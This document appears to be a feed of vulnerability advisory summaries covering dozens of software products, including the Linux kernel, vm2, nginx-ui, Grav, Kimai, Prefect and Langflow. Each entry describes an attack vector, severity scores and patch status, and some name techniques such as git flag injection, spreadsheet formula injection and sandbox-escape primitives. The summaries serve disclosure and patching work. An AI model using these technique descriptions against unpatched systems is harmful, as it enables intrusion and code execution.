Denial of service in Linux kernel KVM x86 nested virtualization allows local privileged attackers to crash virtual machines by manipulating vCPU state through userspace MP_STATE and injected event stuffing. When a vCPU is awakened from a blocking state in L2 (nested guest mode) with an already-injected event, the kernel generates spurious KVM_EXIT_UNKNOWN exits that typically terminate the VM. The vulnerability stems from insufficient validation of impossible vCPU states that userspace can artificially create, despite architectural safeguards that should prevent injected events during blocking. CVSS 5.5 (local, low complexity, high availability impact); EPSS 0.02% indicates minimal widespread exploitation likelihood.

Malicious environment variable injection in Oracle Cloud Native Environment Command Line Interface v2.3.2 allows local authenticated users with low privileges to execute arbitrary code through user interaction, compromising systems running the affected CLI tool. The vulnerability requires local access and user action but results in high-impact code execution with full confidentiality and integrity compromise.

Remote code execution in GeoVision GV-ASWeb 6.2.0 allows authenticated users with System Setting permissions to execute arbitrary commands by bypassing frontend restrictions through crafted HTTP POST requests to the ASWebCommon.srf backend endpoint. This authenticated network-accessible vulnerability achieves full system compromise (confidentiality, integrity, and availability impact) with low attack complexity. No public exploit code or active exploitation confirmed at time of analysis, though EPSS data unavailable for risk contextualization.

Event spoofing in sse-channel (npm) allows attackers to inject arbitrary Server-Sent Events (SSE) messages by passing unsanitized user input to the event, retry, or id fields, enabling client-side manipulation and data integrity violations. Affects sse-channel versions 4.0.0 and earlier; patched in v4.0.1. No public exploit code identified at time of analysis, but vulnerability is straightforward to exploit if user-controlled data reaches SSE field parameters.

Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.

Formula injection in Kimai 2.27.0 through 2.53.0 allows authenticated users with ROLE_USER to create tags containing formula strings (e.g., =SUM(54+51)) via the POST /api/tags endpoint. When administrators export timesheets to XLSX format, the ArrayFormatter joins tag names without sanitization, and OpenSpout automatically promotes formula-prefixed strings to FormulaCell objects. Excel or LibreOffice Calc evaluates these formulas when the exported file is opened, enabling code execution on any workstation that imports and opens the poisoned spreadsheet. Publicly available exploit code demonstrates the attack via normal user account and admin export workflow.

Unauthenticated remote code execution in AVideo ≤29.0 allows attackers to inject and execute arbitrary JavaScript in the browsers of any logged-in users through a WebSocket message relay bypass. An attacker obtains a WebSocket token without authentication from plugin/YPTSocket/getWebSocket.json.php, connects to the WebSocket server, and sends a crafted message with autoEvalCodeOnHTML nested under the json field instead of msg. The incomplete server-side sanitization from prior fix c08694bf6 (GHSA-gph2-j4c9-vhhr) only strips autoEvalCodeOnHTML from $json['msg'], but the relay function msgToResourceId() preferentially selects $msg['json'] as the outbound message carrier. The payload bypasses sanitization, reaches the victim's browser via WebSocket relay, and executes through eval() at plugin/YPTSocket/script.js:573-575. Vendor-released patch: commit 9f3006f9a (recursive stripping across all message carriers). No public exploit identified at time of analysis, but the advisory includes functional proof-of-concept Python code.

XML injection in Traccar 6.11.1 through 6.12.x allows authenticated users with low privileges to inject malicious XML into KML and GPX export files by crafting device names, corrupting file structure and spoofing location data when other users open exported files. Vendor-released patch: version 6.13.0.

Traccar versions 6.11.1 through 6.13.0 fail to escape user-controlled device and computed attributes in CSV export functionality, allowing authenticated attackers to inject spreadsheet formulas that execute when a manager or administrator opens the exported file, potentially leading to command execution or data exfiltration. The vulnerability requires user interaction (opening the CSV) but affects all confidentiality, integrity, and availability once exploitation occurs. Patch available in version 6.13.0.

Environment variable injection in OpenClaw npm package versions before 2026.4.9 allows local attackers with low privileges to compromise application behavior through malicious workspace .env files. Attackers can redirect update sources to serve backdoored packages, modify gateway URLs and ClawHub resolution endpoints to intercept traffic, and override browser executable paths to launch attacker-controlled binaries. Vendor-released patch: version 2026.4.9, with fix also present in latest npm release 2026.4.14. No public exploit identified at time of analysis, but exploitation requires only an untrusted repository with a crafted .env file opened by a victim user.

Server-Side Template Injection in ERPNext v15.103.1 and earlier allows remote code execution through malicious email templates. Attackers with email template editing permissions can inject Jinja2 expressions that execute arbitrary Python code on the server when templates are rendered. SSVC framework confirms POC availability and automatable exploitation with total technical impact. CVSS 9.8 reflects network-reachable critical severity, though the 0.02% EPSS score (5th percentile) suggests limited real-world exploitation attempts to date, likely due to the permission prerequisite.

Remote code execution as root in nginx-ui versions before 2.3.8 via unauthenticated backup restore within 10-minute startup window. Attackers exploit the completely unauthenticated /api/restore endpoint during initial installation to upload malicious backup archives that overwrite app.ini configuration with injected OS commands in TestConfigCmd setting. After automatic application restart, command injection triggers with privileges of the nginx-ui process - typically root in Docker deployments. EPSS data not available; no active exploitation reported but publicly disclosed via GitHub Security Advisory GHSA-4pvg-prr3-9cxr. Patch released in version 2.3.8.

Server-side template injection in OpenMRS Core allows authenticated users with 'Manage Concepts' privilege to execute arbitrary Java code by injecting malicious Apache Velocity templates into concept reference range criteria fields. The vulnerability stems from unsafe VelocityEngine initialization without sandbox restrictions (no SecureUberspector), enabling unrestricted Java reflection. Exploitation persists across all facility users whenever observations are validated against the compromised concept, creating a persistent remote code execution vector. Fixed in versions 2.7.9 and 2.8.6 via migration from Velocity to sandboxed Spring Expression Language (SpEL) with SimpleEvaluationContext. No active exploitation confirmed (not in CISA KEV), but proof-of-concept details available from researcher advisory at machinespirits.com.

Arbitrary code execution in PPTAgent allows local attackers to execute Python code by exploiting unsafe eval() of LLM-generated content with unrestricted builtins. The framework's agentic architecture passes AI-generated code directly to eval() with full builtin access, enabling execution of arbitrary system commands. Patch available via commit 418491a which restricts eval() globals to an empty builtins dictionary and adds path traversal protections. CVSS 8.6 with local attack vector and user interaction requirement; no evidence of active exploitation or public POC at time of analysis.

Prototype pollution in EvoMap Evolver versions prior to 1.69.3 allows local attackers with high privileges to inject malicious properties into Object.prototype via unfiltered Object.assign() calls in the mailbox store module, potentially modifying the behavior of all JavaScript objects and causing information disclosure or denial of service. The vulnerability requires file system write access to the messages.jsonl persistence file and high privileges, limiting real-world exploitability to insider or local compromise scenarios.

Remote code execution in vm2 (Node.js sandbox library) versions prior to 3.11.0 allows unauthenticated network attackers to escape the sandbox and execute arbitrary code on the host system. The SuppressedError vulnerability (GHSA-55hx-c926-fr95) is one of 13 full sandbox-escape primitives patched in this coordinated security release. CVSS 9.8 Critical reflects network-accessible, unauthenticated exploitation with no complexity barriers. No CISA KEV listing or public POC data at time of analysis, but vendor explicitly warns 'embedders running untrusted code should upgrade,' indicating active risk to production deployments using vm2 for sandboxing untrusted JavaScript execution.

Remote code execution in vm2 (Node.js sandbox library) versions prior to 3.11.0 allows unauthenticated attackers to escape the sandbox environment via the inspect function and execute arbitrary system commands. The vulnerability exploits handler leakage through util.inspect's showProxy option to reconstruct host-realm objects and break isolation guarantees. CRITICAL: This is a complete sandbox bypass affecting all deployments using vm2 for untrusted code execution. Vendor-released patch available in version 3.11.0 with multiple commits addressing eight distinct exploitation primitives discovered during iterative disclosure.

Remote code execution in VM2 sandbox (npm package) versions ≤3.10.4 allows attackers to escape the JavaScript isolation boundary and execute arbitrary system commands on the host. The vulnerability exploits prototype chain traversal through Buffer.apply and __lookupGetter__ to access the host Function constructor, bypassing VM2's context isolation. Publicly available exploit code exists, and vendor-released patch version 3.11.0 addresses the issue. This is a complete sandbox escape requiring no authentication or user interaction, making it critical for environments executing untrusted code within VM2 contexts.

Code injection in Apache Atlas DSL search endpoint allows authenticated attackers to manipulate Gremlin traversal queries and access unauthorized data. Affects versions 0.8 through 2.4.0; exploitable in 2.0+ only when non-default configuration 'atlas.dsl.executor.traversal=false' is set. EPSS score of 0.03% (9th percentile) suggests low widespread exploitation probability. No active exploitation confirmed per CISA KEV or vendor advisory. Fixed in version 2.5.0.

Remote code execution in SambaBox 5.1-5.2 allows authenticated administrators to inject and execute arbitrary OS commands through improper input sanitization. Attackers with high-privilege access can achieve full system compromise with confidentiality, integrity, and availability impact. Reported by Turkish national CERT (TR-CERT/USOM), no CISA KEV listing or public exploit code identified at time of analysis, indicating limited observed exploitation activity.

Host header injection in phpBB versions 3.0.0 through 3.3.15 enables password reset link poisoning when force_server_vars is disabled. Attackers manipulating HTTP Host headers can redirect password reset links to attacker-controlled domains, enabling credential theft and account takeover. CVSS 8.1 with network vector and no authentication required, though EPSS exploitation probability is low (0.02%, 4th percentile), suggesting limited observed exploitation activity. Vendor-released fix available in phpBB 3.3.16.

Argument injection in Prefect up to 3.6.25.dev6 allows authenticated attackers to execute arbitrary git commands via specially crafted commit_sha or directories parameters in the GitRepository Pull Handler (src/prefect/runner/storage.py). An attacker can inject git flags like --upload-pack or --config to achieve remote code execution with the privileges of the Prefect runner process. Publicly available exploit code exists, and the vendor has released a patched version (3.6.25.dev7) that validates commit SHA format and adds command-line argument separators to block injection.

Code injection via Websocket API in AV Stumpfl Pixera Two Media Server ≤25.2 R2 allows unauthenticated remote attackers to execute arbitrary code with low complexity. Publicly available exploit code (GitHub Gist) enables network-based compromise with partial impact to confidentiality, integrity, and availability (CVSS:3.1/C:L/I:L/A:L). Vendor-released patch version 25.2 R3 addresses the vulnerability. Despite network vector and proof-of-concept availability, no CISA KEV listing or EPSS data indicates limited observed exploitation at time of analysis.

Code injection via the eval function in Langflow's LambdaFilterComponent allows remote authenticated attackers to execute arbitrary code with low-to-medium integrity and confidentiality impact. The vulnerability affects Langflow up to version 1.8.4, requires user login (PR:L), and has publicly available exploit code. The vendor did not respond to early disclosure notification.

Remote code execution in Widget Options plugin for WordPress (all versions ≤4.2.2) allows authenticated Contributor-level users to execute arbitrary PHP code on the server by bypassing input validation in the Display Logic feature. The plugin's unsafe use of eval() on user-controlled expressions, combined with insufficient authorization checks on the extended_widget_opts_block attribute, enables attackers to chain array_map with string concatenation to bypass blocklists. Version 4.2.0 included a partial patch, indicating the vulnerability remains exploitable in current versions. No CISA KEV listing or public POC identified at time of analysis, but EPSS data not provided for risk calibration.

Code injection vulnerability in nextlevelbuilder ui-ux-pro-max-skill up to 2.5.0 allows authenticated remote attackers to execute arbitrary code via unsanitized plugin names in the Tailwind Config Generator. The _format_plugins function constructs require() statements without validation, enabling attackers with login credentials to inject malicious JavaScript into the Tailwind configuration. Publicly available exploit code exists and the vendor has released a patch via pull request, though adoption status is unconfirmed.

Linux kernel GSO feature check reads uninitialized IPv4 header data when processing packets from PF_PACKET paths, causing kernel memory disclosure or denial of service. The vulnerability affects multiple kernel versions before 6.12.81, 6.19.12, and 7.0, and requires local user access to trigger via raw packet injection.

Code injection in ExifTool versions up to 13.53 allows local attackers with limited privileges to execute arbitrary code via manipulation of the -ee argument in the Process_mrld function when processing JPEG/QuickTime/MOV/MP4 files. The vulnerability has a very low CVSS score of 1.9 due to local-only attack vector and low impact, but is tagged as RCE. Vendor-released patch available in version 13.54.

Code injection in Bootstrap CMS 0.9.0-alpha page creation handler allows authenticated remote attackers to inject arbitrary code via the body parameter in resources/views/pages/show.blade.php, with publicly available exploit code and a CVSS score of 2.1 reflecting low confidentiality/integrity impact. The vulnerability affects an unmaintained product with an inactive code repository, limiting real-world exposure but enabling opportunistic exploitation of legacy deployments.

Remote code execution in IBM Langflow Desktop 1.0.0 through 1.8.4 allows authenticated attackers to execute arbitrary commands at the privilege level of the Langflow process. Attackers can exfiltrate API keys and database credentials from environment variables, modify application files, or pivot to internal network targets. IBM has released a vendor patch addressing this code injection vulnerability. No active exploitation confirmed by CISA KEV at time of analysis, though CVSS 8.8 severity and low attack complexity indicate high exploitability once authenticated access is obtained.

Code injection in Qt SVG module allows attackers to execute arbitrary QML/JavaScript when applications load malicious SVG files through Qt Quick's VectorImage component. Exploitation requires local file access and user interaction (opening crafted SVG). While QML execution is more restricted than native code, attackers can still trigger denial of service, exfiltrate application data, or manipulate UI logic depending on the victim application's privilege context. No active exploitation confirmed (not in CISA KEV), but patch available from Qt Project reduces urgency for immediate emergency response.